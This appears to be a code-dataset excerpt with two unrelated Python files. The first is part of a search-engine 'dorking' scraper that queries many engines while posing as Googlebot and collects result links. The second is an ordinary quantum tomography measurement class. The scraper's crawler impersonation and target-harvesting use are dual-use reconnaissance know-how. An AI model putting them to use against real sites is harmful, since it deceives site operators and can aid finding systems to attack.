search_url = "http://www.business.com/search/rslt_default.asp?vt=all&type=web&query=" + urllib2.quote(search)
elif self._engine == 'globalspec':
search_url = "http://search.globalspec.com/Search?query=" + urllib2.quote(search)
elif self._engine == 'taptu':
search_url = "http://www.taptu.com/search/lite/results?term=" + urllib2.quote(search)
elif self._engine == 'topix':
search_url = "http://www.topix.com/search/article?q=" + urllib2.quote(search)
elif self._engine == 'hakia':
search_url = "http://hakia.com/search?q=" + urllib2.quote(search)
elif self._engine == 'leapfish':
search_url = "http://www.leapfish.com/web.aspx?q=" + urllib2.quote(search)
#elif self._engine == 'webcrawler': # works at 20-02-2011
# urlpar = "rawURL"
# search_url = "http://www.webcrawler.com/webcrawler203/ws/results/Web/" + urllib2.quote(search) + "/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true"
elif self._engine == 'excite':
search_url = "http://msxml.excite.com/excite/ws/results/Web/" + urllib2.quote(search) + "/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true"
elif self._engine == 'yolink':
search_url = "http://cloud.yolink.com/search/search?keywords=" + urllib2.quote(search)
elif self._engine == 'lycos':
search_url = "http://search.lycos.com/?tab=web&query=" + urllib2.quote(search)
else:
print "\nThis search engine is not allowed. Check dork.py file to see a complete list\n"
try:
self.search_url = search_url
url = urllib2.urlopen(urllib2.Request(search_url,
headers={'User-Agent':
"Googlebot/2.1 (+http://www.google.com/bot.html"}))
except urllib2.URLError, e:
if DEBUG:
traceback.print_exc()
raise Exception("Internal error dorking: " + e.message)
html_data = url.read()
html_data = html_data.replace(">",">\n")
html_data = html_data.replace("target=_",'target="_')
html_data = html_data.replace('\ >','/>')
html_data = html_data.replace('\>','/>')
html_data = html_data.replace('"">','">')
html_data = html_data.replace('</scr"+"ipt>','</script>')
content_type = url.headers['content-type']
try:
encoding = content_type.split(";")[1].split("=")[1].strip()
except:
encoding = 'utf-8'
if raw_extract:
links = raw_extract(html_data, encoding)
else:
try:
soup = BeautifulSoup(html_data, fromEncoding=encoding)
except Exception, e:
traceback.print_exc()
raise Exception("Internal error dorking:" + e.message)
if divid:
#print(html_data)
soup = soup.find('div', {'id':divid})
if css_class:
links = soup.findAll(html_tok, {'class':css_class})
else:
links = soup.findAll(html_tok)
found_links = []
if unpack_func:
links = map(unpack_func, links)
links = filter(lambda s: s, links)
for link in links:
try:
href = str(link['href'].encode('utf-8'))
except KeyError:
# this link has no href
pass
else:
if not href.startswith("/") and not "microsofttranslator" in href and not "bingj" in href and not "live.com" in href and not "scroogle" in href:
if urlpar:
parsed = urlparse.urlparse(href)
q = urlparse.parse_qs(parsed.query)
if urlpar in q and q[urlpar]:
href = urlparse.unquote(q[urlpar][0])
found_links.append(href)
else:
found_links.append(href)
return found_links
if __name__ == '__main__':
for a in ['google', 'altavista', 'yahoo', 'baidu', 'bing', 'webcrawler',
'youdao', 'yandex']:
dork = Dorker(a)
res = dork.dork("lorea")
print a,len(res)
for b in res:
print " *", b
| gpl-2.0 | 8,629,160,586,795,557,000 | 47.948718 | 190 | 0.517099 | false | 3.764225 | false | false | false |
ooovector/qtlab_replacement | tomography.py | 1 | 2105 | from . import data_reduce
import numpy as np
from . import readout_classifier
#import cvxopt
#import cvxpy
class tomography:
def __init__(self, sz_measurer, pulse_generator, proj_seq, reconstruction_basis={}):
self.sz_measurer = sz_measurer
#self.adc = adc
self.pulse_generator = pulse_generator
self.proj_seq = proj_seq
self.reconstruction_basis=reconstruction_basis
self.adc_reducer = data_reduce.data_reduce(self.sz_measurer.adc)
self.adc_reducer.filters['SZ'] = {k:v for k,v in self.sz_measurer.filter_binary.items()}
self.adc_reducer.filters['SZ']['filter'] = lambda x: 1-2*self.sz_measurer.filter_binary_func(x)
def get_points(self):
points = { p:{} for p in self.proj_seq.keys() }
points.update({p:{} for p in self.reconstruction_basis.keys()})
return points
def get_dtype(self):
dtypes = { p:float for p in self.proj_seq.keys() }
dtypes.update({ p:float for p in self.reconstruction_basis.keys() })
return dtypes
def set_prepare_seq(self, seq):
self.prepare_seq = seq
def measure(self):
meas = {}
for p in self.proj_seq.keys():
self.pulse_generator.set_seq(self.prepare_seq+self.proj_seq[p]['pulses'])
meas[p] = np.real(np.mean(self.adc_reducer.measure()['SZ'])/2)
proj_names = self.proj_seq.keys()
basis_axes_names = self.reconstruction_basis.keys()
#TODO: fix this norm stuff in accordance with theory
basis_vector_norms = np.asarray([np.linalg.norm(self.reconstruction_basis[r]['operator']) for r in basis_axes_names])
if len(self.reconstruction_basis.keys()):
reconstruction_matrix = np.real(np.asarray([[np.sum(self.proj_seq[p]['operator']*np.conj(self.reconstruction_basis[r]['operator'])) \
for r in basis_axes_names] \
for p in proj_names]))
projections = np.linalg.lstsq(reconstruction_matrix, [meas[p] for p in proj_names])[0]*(basis_vector_norms**2)
meas.update({k:v for k,v in zip(basis_axes_names, projections)})
return meas
def get_opts(self):
opts = { p:{} for p in self.proj_seq.keys()}
opts.update ({ p:{} for p in self.reconstruction_basis.keys()})
return opts
| gpl-3.0 | 7,328,445,836,942,787,000 | 36.607143 | 136 | 0.690261 | false | 2.891484 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.